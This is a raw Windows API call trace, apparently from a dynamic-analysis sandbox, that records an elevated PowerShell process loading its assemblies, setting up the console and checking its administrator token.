	[0637.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.992] CoTaskMemAlloc (cb=0x104) returned 0x340b90
	[0637.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x340b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0637.992] CoTaskMemFree (pv=0x340b90) 
	[0647.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0647.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0650.653] CoTaskMemAlloc (cb=0x104) returned 0x340b90
	[0650.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x340b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.653] CoTaskMemFree (pv=0x340b90) 
	[0650.654] CoTaskMemAlloc (cb=0x104) returned 0x340b90
	[0650.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x340b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.655] CoTaskMemFree (pv=0x340b90) 
	[0650.663] CoTaskMemAlloc (cb=0x104) returned 0x368c20
	[0650.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x368c20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.664] CoTaskMemFree (pv=0x368c20) 
	[0650.664] CoTaskMemAlloc (cb=0x104) returned 0x368c20
	[0650.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x368c20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.664] CoTaskMemFree (pv=0x368c20) 
	[0650.664] CoTaskMemAlloc (cb=0x104) returned 0x368c20
	[0650.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x368c20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.665] CoTaskMemFree (pv=0x368c20) 
	[0655.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0655.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0657.300] CoTaskMemAlloc (cb=0x104) returned 0x368d50
	[0657.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x368d50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.300] CoTaskMemFree (pv=0x368d50) 
	[0657.302] CoTaskMemAlloc (cb=0x104) returned 0x368d50
	[0657.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x368d50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.302] CoTaskMemFree (pv=0x368d50) 
	[0657.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0657.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0667.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0667.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0672.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0672.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0679.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0679.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0682.634] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3320
	[0682.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0682.634] CoTaskMemFree (pv=0x1b6e3320) 
	[0682.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0682.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0682.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0688.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xed6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0688.706] SetErrorMode (uMode=0x1) returned 0x1
	[0688.706] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xed920 | out: lpFileInformation=0xed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0688.706] SetErrorMode (uMode=0x1) returned 0x1
	[0704.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0704.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0704.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0704.632] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0704.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.632] CoTaskMemFree (pv=0x1b6e3570) 
	[0704.635] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0704.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.635] CoTaskMemFree (pv=0x1b6e3570) 
	[0704.635] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0704.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.636] CoTaskMemFree (pv=0x1b6e3570) 
	[0704.638] CoCreateGuid (in: pguid=0xedce8 | out: pguid=0xedce8*(Data1=0x9c665613, Data2=0x8e03, Data3=0x47c7, Data4=([0]=0xb2, [1]=0x64, [2]=0x1c, [3]=0x53, [4]=0xc8, [5]=0xef, [6]=0xac, [7]=0xf3))) returned 0x0
	[0704.642] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0704.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.642] CoTaskMemFree (pv=0x1b6e3570) 
	[0704.646] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0704.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.646] CoTaskMemFree (pv=0x1b6e3570) 
	[0704.648] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0704.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.649] CoTaskMemFree (pv=0x1b6e3570) 
	[0704.667] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0707.215] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xed990 | out: lpConsoleScreenBufferInfo=0xed990) returned 1
	[0707.237] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0707.238] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xed990 | out: lpConsoleScreenBufferInfo=0xed990) returned 1
	[0707.240] GetVersionExW (in: lpVersionInformation=0xed920*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed920*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0707.246] GetCurrentProcess () returned 0xffffffffffffffff
	[0707.247] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xed9b8 | out: TokenHandle=0xed9b8*=0x310) returned 1
	[0707.251] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xed8d8 | out: TokenInformation=0x0, ReturnLength=0xed8d8) returned 0
	[0707.252] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x307310
	[0707.252] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x307310, TokenInformationLength=0x4, ReturnLength=0xed8d8 | out: TokenInformation=0x307310, ReturnLength=0xed8d8) returned 1
	[0707.254] DuplicateTokenEx (in: hExistingToken=0x310, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xeda38 | out: phNewToken=0xeda38*=0x30c) returned 1
	[0710.147] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xed8d8 | out: TokenInformation=0x0, ReturnLength=0xed8d8) returned 0
	[0710.148] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x307340
	[0710.148] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x307340, TokenInformationLength=0x4, ReturnLength=0xed8d8 | out: TokenInformation=0x307340, ReturnLength=0xed8d8) returned 1
	[0710.149] CheckTokenMembership (in: TokenHandle=0x30c, SidToCheck=0x2c77ff0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xeda48 | out: IsMember=0xeda48) returned 1
	[0710.149] CloseHandle (hObject=0x30c) returned 1
	[0710.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0710.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0710.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0710.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0713.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0713.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0713.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0713.138] CoTaskMemAlloc (cb=0x804) returned 0x1b6e5430
	[0713.138] GetConsoleTitleW (in: lpConsoleTitle=0x1b6e5430, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0713.139] CoTaskMemFree (pv=0x1b6e5430) 
	[0713.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0713.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0713.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0713.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0715.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0715.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0715.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0715.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0715.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0715.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0715.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0715.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0715.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
